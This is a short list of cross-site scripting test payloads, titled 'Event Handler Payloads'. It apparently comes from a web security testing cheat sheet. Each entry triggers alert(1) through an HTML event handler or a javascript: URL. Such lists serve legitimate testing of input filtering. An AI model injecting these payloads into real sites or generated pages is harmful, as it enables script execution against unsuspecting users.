# Event Handler Payloads
<img src=x onerror=alert(1)>
<img src="javascript:alert(1)">
<svg onload=alert(1)>
<body onload=alert(1)>
<video><source onerror="alert(1)">
<audio src=1 onerror=alert(1)>
<details open ontoggle=alert(1)>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<marquee onstart=alert(1)>
<style/onload=alert(1)>
<div onmouseover="alert(1)">XSS</div>
<a onmouseover="alert(1)">XSS</a>
<body onscroll=alert(1)><br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(1)">XSS</button></form>
